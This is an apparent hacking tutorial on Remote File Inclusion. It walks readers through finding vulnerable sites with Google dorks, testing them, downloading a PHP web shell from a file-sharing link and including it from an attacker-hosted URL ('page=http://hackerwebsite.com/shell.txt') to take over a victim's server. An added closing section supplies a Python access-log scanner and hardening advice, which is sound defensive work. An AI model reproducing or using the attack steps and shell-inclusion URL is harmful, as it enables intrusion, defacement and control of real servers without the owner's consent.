Remote File Inclusion (RFI) allows an attacker to get his own file included and run on a website's server through a vulnerable script. RFI is a common vulnerability found in many websites. Using RFI you can literally deface a website and get complete access to the server. In this tutorial, I'll try to make it as simple as possible. (Noob Friendly)
1. Searching for RFI vulnerability
The vulnerability is usually found in websites that have a URL navigation similar to:
- www.victimwebsite.com/index.php?page=something
This can be found by the use of Google dorks, e.g. inurl:index.php?page=
2. Testing for RFI vulnerability
After targeting a website, you need to make sure that it's really vulnerable to this type of attack by testing using:
- www.victimwebsite.com/index.php?page=http://www.google.com/?
Press Enter and if the Google home page appears instead of the victim's website, then it is vulnerable to RFI.
3. Gaining Access to the server
Now you need to execute your own script on the victim's webserver with the help of a shell. Shells are scripts that allow a hacker to view a server's directories, view and delete files, and run commands.
DOWNLOAD SHELL: http://www.mediafire.com/file/d6jafoo2iafsaj4/shell.php
Now upload the shell to any webhost (hacker's website) and get its URL,
e.g. www.hackerwebsite.com/shell.txt
You need to upload the shell as a text file (shell.txt) instead of shell.php. The reason is that if you upload it as "shell.php", it's going to execute on the hacker's website instead of the victim's website. Get my point?
Now you need to hook up your victim's server to your shell by replacing the Google URL with your shell URL so that it looks like this:
www.victimwebsite.com/index.php?page=http://hackerwebsite.com/shell.txt
Hit Enter!!! And it's game over... you have complete access to the victim's server and you can do anything with it... :P
The above image shows what your shell window would look like after you have successfully hacked into a website.
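For the site owner's side of the steps above, an added example (not part of the original tutorial) that scans web server access logs for requests whose query parameter carries a remote URL, as in the `page=http://...` requests shown. The log lines are constructed, in combined log format, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# A parameter value that starts with one of these schemes is a URL, not a page name.
REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftps?)://", re.I)
# Combined log format: client IP ... "METHOD target HTTP/x.y" status
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample lines; the host names are the tutorial's placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=contact HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=http://www.google.com/? HTTP/1.1" 200 14873',
    '198.51.100.9 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?page=http%3A%2F%2Fhackerwebsite.com%2Fshell.txt HTTP/1.1" 200 20311',
    '203.0.113.7 - - [01/Jan/2024:10:00:20 +0000] "GET /search.php?q=what+is+http HTTP/1.1" 200 901',
]

def decode_fully(value, rounds=3):
    """Undo percent-encoding that was applied more than once before logging."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_rfi_attempts(log_lines):
    """Return (client_ip, parameter, decoded_value, status) per suspicious parameter."""
    hits = []
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line in the expected format
        ip, target, status = m.group(1), m.group(2), int(m.group(3))
        # parse_qsl decodes once; decode_fully handles any remaining layers
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            value = decode_fully(value)
            if REMOTE_SCHEME.match(value):
                hits.append((ip, name, value, status))
    return hits

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

A hit that was answered with status 200 is a reason to review how the script builds its include path. Mapping the parameter to a fixed list of local files, with PHP's `allow_url_include` left at its default of off, removes the condition the tutorial depends on.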